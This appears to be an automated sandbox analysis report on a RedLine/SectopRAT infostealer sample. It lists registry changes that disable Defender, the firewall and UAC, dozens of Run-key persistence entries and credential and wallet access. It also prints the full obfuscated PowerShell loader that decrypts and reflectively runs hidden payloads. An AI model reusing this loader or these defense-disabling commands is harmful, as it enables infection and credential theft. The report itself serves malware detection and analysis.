redline | d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	powershell.exe

Modifies firewall policy service 3 TTPs 2 IoCs

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/3904-173-0x00000000070E0000-0x00000000070FE000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/3904-173-0x00000000070E0000-0x00000000070FE000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5688	bcdedit.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
1	3904	powershell.exe
13	3904	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5440	powershell.exe
1308	powershell.exe
6108	powershell.exe
856	powershell.exe
4160	powershell.exe
5100	powershell.exe
1184	powershell.exe
3632	powershell.exe
776	powershell.exe
1944	powershell.exe
4892	powershell.exe
3140	powershell.exe
2736	powershell.exe
4608	powershell.exe
2480	powershell.exe
4088	powershell.exe
5700	powershell.exe
4376	powershell.exe
5416	powershell.exe
980	powershell.exe
4316	powershell.exe
5196	powershell.exe
2876	powershell.exe
1100	powershell.exe
3768	powershell.exe
5752	powershell.exe
3528	powershell.exe
1224	powershell.exe
4976	powershell.exe
1992	powershell.exe
5908	powershell.exe
3620	powershell.exe
1080	powershell.exe
1360	powershell.exe
3904	powershell.exe
3240	powershell.exe
4664	powershell.exe
5996	powershell.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
4488	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation	B4B2DF0C17B9CC137372CFB2165D613B.exe

Executes dropped EXE 2 IoCs

pid	Process
1200	0h4sagxy.p0j.exe
4696	0h4sagxy.p0j.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 30 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AWindowsService = "AWindowsService.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "WindowsInstaller "	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\root-cryptor = "root-cryptor.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System3264Wow = "System3264Wow"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System = "System.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\keygroup777.ru = "native.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "System3264Wow"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "WINDOWS"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\_default64 = "_default64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS = "WINDOWS"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\root-cryptor = "root-cryptor.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\taskhost = "taskhost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windowsx-c = "windowsx-c.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\keygroup777.ru = "native.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crypt0rroot = "crypt0rroot.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WindowsInstaller = "WindowsInstaller "	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\crypt0rroot = "crypt0rroot.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AWindowsService = "AWindowsService.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "OneDrive10293"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "taskhost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowsx-c = "windowsx-c.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_default64 = "_default64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MSEdgeUpdateX = "MSEdgeUpdateX"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "MSEdgeUpdateX"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive10293 = "OneDrive10293"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "System.exe"	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

persistence privilege_escalation

Clear Persistence

T1070.009

pid	Process
4788	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2376	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe

Kills process with taskkill 9 IoCs

pid	Process
4388	taskkill.exe
4088	taskkill.exe
5504	taskkill.exe
1448	taskkill.exe
5256	taskkill.exe
4636	taskkill.exe
5392	taskkill.exe
1536	taskkill.exe
3576	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
4864	reg.exe
2592	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1972	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1224	powershell.exe
1224	powershell.exe
1360	powershell.exe
1360	powershell.exe
3240	powershell.exe
3240	powershell.exe
3904	powershell.exe
4664	powershell.exe
3904	powershell.exe
4664	powershell.exe
5996	powershell.exe
5996	powershell.exe
3768	powershell.exe
3768	powershell.exe
4976	powershell.exe
4976	powershell.exe
5752	powershell.exe
5752	powershell.exe
3528	powershell.exe
3528	powershell.exe
1992	powershell.exe
1992	powershell.exe
5908	powershell.exe
5908	powershell.exe
3620	powershell.exe
3620	powershell.exe
1080	powershell.exe
1080	powershell.exe
3904	powershell.exe
3904	powershell.exe
6116	B4B2DF0C17B9CC137372CFB2165D613B.exe
6116	B4B2DF0C17B9CC137372CFB2165D613B.exe
5196	powershell.exe
5196	powershell.exe
2876	powershell.exe
2876	powershell.exe
5100	powershell.exe
5416	powershell.exe
5100	powershell.exe
5416	powershell.exe
1184	powershell.exe
4608	powershell.exe
1100	powershell.exe
1184	powershell.exe
4608	powershell.exe
1100	powershell.exe
3632	powershell.exe
3632	powershell.exe
2480	powershell.exe
2480	powershell.exe
4088	powershell.exe
4088	powershell.exe
5440	powershell.exe
5440	powershell.exe
776	powershell.exe
776	powershell.exe
1308	powershell.exe
1308	powershell.exe
6108	powershell.exe
6108	powershell.exe
1944	powershell.exe
1944	powershell.exe
980	powershell.exe
980	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6116	B4B2DF0C17B9CC137372CFB2165D613B.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeDebugPrivilege	5996	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	5752	powershell.exe
Token: SeDebugPrivilege	3528	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	5908	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	5392	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	5504	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	1448	taskkill.exe
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	4388	taskkill.exe
Token: SeDebugPrivilege	5196	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	5416	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	4608	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	5440	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeIncreaseQuotaPrivilege	776	powershell.exe
Token: SeSecurityPrivilege	776	powershell.exe
Token: SeTakeOwnershipPrivilege	776	powershell.exe
Token: SeLoadDriverPrivilege	776	powershell.exe
Token: SeSystemProfilePrivilege	776	powershell.exe
Token: SeSystemtimePrivilege	776	powershell.exe
Token: SeProfSingleProcessPrivilege	776	powershell.exe
Token: SeIncBasePriorityPrivilege	776	powershell.exe
Token: SeCreatePagefilePrivilege	776	powershell.exe
Token: SeBackupPrivilege	776	powershell.exe
Token: SeRestorePrivilege	776	powershell.exe
Token: SeShutdownPrivilege	776	powershell.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeSystemEnvironmentPrivilege	776	powershell.exe
Token: SeRemoteShutdownPrivilege	776	powershell.exe
Token: SeUndockPrivilege	776	powershell.exe
Token: SeManageVolumePrivilege	776	powershell.exe
Token: 33	776	powershell.exe
Token: 34	776	powershell.exe
Token: 35	776	powershell.exe
Token: 36	776	powershell.exe
Token: SeDebugPrivilege	6108	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	4636	taskkill.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	856	powershell.exe
Token: SeDebugPrivilege	3140	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 6116 wrote to memory of 1948	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	87
PID 6116 wrote to memory of 1948	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	87
PID 6116 wrote to memory of 5232	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	89
PID 6116 wrote to memory of 5232	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	89
PID 6116 wrote to memory of 1224	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	90
PID 6116 wrote to memory of 1224	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	90
PID 5232 wrote to memory of 2552	5232	cmd.exe	93
PID 5232 wrote to memory of 2552	5232	cmd.exe	93
PID 5232 wrote to memory of 1360	5232	cmd.exe	94
PID 5232 wrote to memory of 1360	5232	cmd.exe	94
PID 1948 wrote to memory of 3220	1948	cmd.exe	95
PID 1948 wrote to memory of 3220	1948	cmd.exe	95
PID 1948 wrote to memory of 3904	1948	cmd.exe	96
PID 1948 wrote to memory of 3904	1948	cmd.exe	96
PID 1948 wrote to memory of 3904	1948	cmd.exe	96
PID 6116 wrote to memory of 3240	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	97
PID 6116 wrote to memory of 3240	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	97
PID 6116 wrote to memory of 4664	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	99
PID 6116 wrote to memory of 4664	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	99
PID 6116 wrote to memory of 5996	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	101
PID 6116 wrote to memory of 5996	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	101
PID 6116 wrote to memory of 3768	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	103
PID 6116 wrote to memory of 3768	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	103
PID 6116 wrote to memory of 4976	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	105
PID 6116 wrote to memory of 4976	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	105
PID 6116 wrote to memory of 5752	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	108
PID 6116 wrote to memory of 5752	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	108
PID 6116 wrote to memory of 3528	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	110
PID 6116 wrote to memory of 3528	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	110
PID 6116 wrote to memory of 1992	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	112
PID 6116 wrote to memory of 1992	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	112
PID 6116 wrote to memory of 5908	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	114
PID 6116 wrote to memory of 5908	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	114
PID 6116 wrote to memory of 3620	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	116
PID 6116 wrote to memory of 3620	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	116
PID 6116 wrote to memory of 1080	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	118
PID 6116 wrote to memory of 1080	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	118
PID 6116 wrote to memory of 1972	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	120
PID 6116 wrote to memory of 1972	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	120
PID 6116 wrote to memory of 5280	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	126
PID 6116 wrote to memory of 5280	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	126
PID 6116 wrote to memory of 5260	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	127
PID 6116 wrote to memory of 5260	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	127
PID 5260 wrote to memory of 5392	5260	cmd.exe	130
PID 5260 wrote to memory of 5392	5260	cmd.exe	130
PID 5280 wrote to memory of 4088	5280	cmd.exe	131
PID 5280 wrote to memory of 4088	5280	cmd.exe	131
PID 6116 wrote to memory of 4640	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	132
PID 6116 wrote to memory of 4640	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	132
PID 6116 wrote to memory of 1848	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	134
PID 6116 wrote to memory of 1848	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	134
PID 4640 wrote to memory of 5504	4640	cmd.exe	136
PID 4640 wrote to memory of 5504	4640	cmd.exe	136
PID 1848 wrote to memory of 1536	1848	cmd.exe	137
PID 1848 wrote to memory of 1536	1848	cmd.exe	137
PID 6116 wrote to memory of 3576	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	138
PID 6116 wrote to memory of 3576	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	138
PID 6116 wrote to memory of 2556	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	140
PID 6116 wrote to memory of 2556	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	140
PID 6116 wrote to memory of 2072	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	142
PID 6116 wrote to memory of 2072	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	142
PID 2556 wrote to memory of 1448	2556	cmd.exe	143
PID 2556 wrote to memory of 1448	2556	cmd.exe	143
PID 6116 wrote to memory of 5256	6116	B4B2DF0C17B9CC137372CFB2165D613B.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe
"C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\cqxwsvrp.vd1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\1sys20kx.h5i.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\1sys20kx.h5i.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
